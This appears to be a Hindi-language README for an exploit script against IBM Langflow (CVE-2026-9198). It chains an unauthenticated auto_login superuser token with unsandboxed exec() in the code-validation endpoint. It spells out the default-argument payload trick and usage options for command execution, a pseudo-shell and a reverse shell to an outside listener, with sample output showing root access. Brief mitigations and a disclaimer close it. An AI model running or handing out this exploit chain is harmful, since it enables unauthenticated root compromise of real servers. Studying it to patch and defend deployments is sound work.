
डिफ़ॉल्ट तैनाती पर IBM Langflow OSS (1.0.0 – 1.10.0) में बिना प्रमाणीकरण के रिमोट कोड निष्पादन। यह दो कमज़ोरियों को जोड़ता है:
AUTO_LOGIN सक्षम हो (Langflow < 1.5 में डिफ़ॉल्ट), GET /api/v1/auto_login बिना किसी क्रेडेंशियल के किसी भी कॉलर को SUPERUSER JWT जारी करता है।POST /api/v1/validate/code उपयोगकर्ता द्वारा प्रदान किए गए Python को बिना किसी सैंडबॉक्स के exec() में पास करता है।साथ मिलकर (CVE-2026-9198) एक बिना प्रमाणीकृत हमलावर Langflow सेवा उपयोगकर्ता के रूप में कोड निष्पादन प्राप्त करता है — जो अक्सर root होता है।
/api/v1/auto_login से सुपरयूज़र bearer टोकन का अनुरोध करता है (कोई प्रमाणीकरण नहीं)।
/api/v1/validate/code को एक payload सबमिट करता है। एंडपॉइंट कोड को "मान्य" करने के लिए exec() करता है; Python परिभाषा के समय डिफ़ॉल्ट तर्क मानों का मूल्यांकन करता है, इसलिए payload को फ़ंक्शन डिफ़ॉल्ट तर्क में लपेटा जाता है:
def _v(a=exec('<payload>')): pass
कमांड निष्पादन के लिए payload एक अपवाद उठाता है जिसका संदेश कमांड आउटपुट होता है, जिसे एंडपॉइंट प्रतिक्रिया (function.errors[]) में वापस दर्शाता है।
./exploit.py -t <target> [options]
-t, --target target host/IP (or full URL) (required)
-p, --port Langflow port (default 7860)
-c, --cmd run a single shell command, print output
--shell interactive pseudo-shell (each line runs via the RCE)
--lhost reverse-shell listener IP
--lport reverse-shell listener port (default 4444)
-k, --token use this bearer token (skip auto_login)
--timeout HTTP timeout in seconds (default 20)
--no-banner suppress the banner
-h, --help show help
$ ./exploit.py -t 192.168.30.128
CVE-2026-9198 — Langflow unauthenticated RCE
auto_login (superuser token) -> validate/code (exec)
[*] requesting superuser token via /api/v1/auto_login ...
[+] token: eyJhbGciOiJIUzI1NiIsInR...
uid=0(root) gid=0(root) groups=0(root)
$ ./exploit.py -t 192.168.30.128 -c 'cat /root/proof.txt'
...
d4b81f6a3c9e07254f6a3c9e07254d4b
$ ./exploit.py -t 192.168.30.128 --shell
[+] RCE confirmed: uid=0(root) gid=0(root) groups=0(root)
[*] pseudo-shell — each line runs via a fresh request. Ctrl-C / 'exit' to quit.
langflow$ hostname
flow
langflow$ whoami
root
# reverse shell (start `nc -lvnp 4444` first)
$ ./exploit.py -t 192.168.30.128 --lhost 10.10.14.7 --lport 4444
[*] sending reverse shell to 10.10.14.7:4444 (start your listener first) ...
[+] payload sent. Check your listener.
pip install आवश्यक नहीं)AUTO_LOGIN सक्षम हो (Langflow < 1.5 के लिए डिफ़ॉल्ट; >= 1.5 पर इसे स्पष्ट रूप से LANGFLOW_AUTO_LOGIN=true होना चाहिए)। यदि auto_login कोई टोकन नहीं लौटाता है, तो लक्ष्य इस मार्ग से शोषण योग्य नहीं है — यदि आपके पास है तो -k के साथ एक मान्य टोकन प्रदान करें।function.errors[] में लौटाया जाता है; stderr को stdout में मिला दिया जाता है ताकि विफल कमांड भी अपनी त्रुटि दिखाएँ।root है (systemd/Docker-as-root के अंतर्गत सादे langflow run के साथ सामान्य), तो यह सीधे होस्ट root तक पहुँच है।validate/code को अविश्वसनीय इनपुट का exec() नहीं करना चाहिए और auto_login को सुपरयूज़र टोकन जारी नहीं करने चाहिए।LANGFLOW_AUTO_LOGIN=false सेट करें और वास्तविक सुपरयूज़र क्रेडेंशियल कॉन्फ़िगर करें।root के रूप में न चलाएँ।यह परियोजना केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रकाशित की गई है। इसका उपयोग उन प्रणालियों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है। लेखक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करता है।